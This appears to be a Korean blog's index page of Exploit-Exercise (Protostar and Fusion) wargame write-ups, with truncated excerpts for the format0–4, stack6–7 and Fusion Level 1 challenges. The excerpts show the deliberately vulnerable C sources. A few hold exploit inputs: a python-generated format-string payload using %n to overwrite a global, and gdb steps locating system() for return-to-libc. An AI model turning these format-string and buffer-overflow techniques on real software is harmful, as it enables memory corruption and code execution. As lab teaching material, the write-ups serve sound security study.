Exploit-Exercise
-
format4Exploit-Exercise 2016. 8. 18. 00:41
12345678910111213141516171819202122232425262728#include #include #include #include int target; void hello(){ printf("code execution redirected! you win\n"); _exit(1);} void vuln(){ char buffer[512]; fgets(buffer, sizeof(buffer), stdin); printf(buffer); exit(1); } int main(int argc, char **argv){ vuln();}Colored by Color Scriptercs 그냥 hello함수를 호출해주면된다. 하지만 vuln함수에서 exit(1);을 호출한다. 근데 뭐 상관없다. exit..
-
format3Exploit-Exercise 2016. 8. 18. 00:32
12345678910111213141516171819202122232425262728293031#include #include #include #include int target; void printbuffer(char *string){ printf(string);} void vuln(){ char buffer[512]; fgets(buffer, sizeof(buffer), stdin); printbuffer(buffer); if(target == 0x01025544) { printf("you have modified the target :)\n"); } else { printf("target is %08x :(\n", target); }} int main(int argc, char **argv){ vu..
-
format2Exploit-Exercise 2016. 8. 18. 00:25
12345678910111213141516171819202122232425#include #include #include #include int target; void vuln(){ char buffer[512]; fgets(buffer, sizeof(buffer), stdin); printf(buffer); if(target == 64) { printf("you have modified the target :)\n"); } else { printf("target is %d :(\n", target); }} int main(int argc, char **argv){ vuln();}Colored by Color Scriptercs 입력값받고, 간단하게 전역변수인 target을 64로 바꾸면되는문제다. 값이..
-
format1Exploit-Exercise 2016. 8. 18. 00:19
#include #include #include #include int target; void vuln(char *string) { printf(string); if(target) { printf("you have modified the target :)\n"); } } int main(int argc, char **argv) { vuln(argv[1]); } 134번이나 하면 내가 입력해준 AAAA가 출력된다. 그럼 처음에 target 전역변수 주소를 구해서 넣어주면되겠다. root@ubuntu:/home/study# ./fsb1 $(python -c 'print "\x28\xa0\x04\x08%111x%134$n"')( 2fyou have modified the target :) root@ubuntu..
-
Fusion Level 1Exploit-Exercise 2016. 7. 12. 23:52
#include "../common/common.c" int fix_path(char *path) { char resolved[128]; if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open strcpy(path, resolved); } char *parse_http_request() { char buffer[1024]; char *path; char *q; // printf("[debug] buffer is at 0x%08x :-)\n", buffer); :D if(read(0, buffer, sizeof(buffer))
-
format0Exploit-Exercise 2015. 12. 8. 23:32
buffer[64] + target(4) 존재 . #include #include #include #include void vuln(char *string) { volatile int target; char buffer[64]; target = 0; sprintf(buffer, string); if(target == 0xdeadbeef) { printf("you have hit the target correctly :)\n"); } } int main(int argc, char **argv) { vuln(argv[1]); } root@s0ngsari-virtual-machine:~/Desktop/study/protostar/format# ./format0 $(python -c 'print "\x90"*6..
-
stack7Exploit-Exercise 2015. 12. 8. 23:23
#include #include #include #include char *getpath() { char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xb0000000) == 0xb0000000) { printf("bzzzt (%p)\n", ret); _exit(1); } printf("got path %s\n", buffer); return strdup(buffer); } int main(int argc, char **argv) { getpath(); } 그저 0xb..... 로시작하는 오프셋만 아니면된다..
-
stack6Exploit-Exercise 2015. 12. 8. 23:17
#include #include #include #include void getpath() { char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xbf000000) == 0xbf000000) { printf("bzzzt (%p)\n", ret); _exit(1); } printf("got path %s\n", buffer); } int main(int argc, char **argv) { getpath(); } (gdb) p system$1 = {} 0x4007c190 (gdb) find &system,..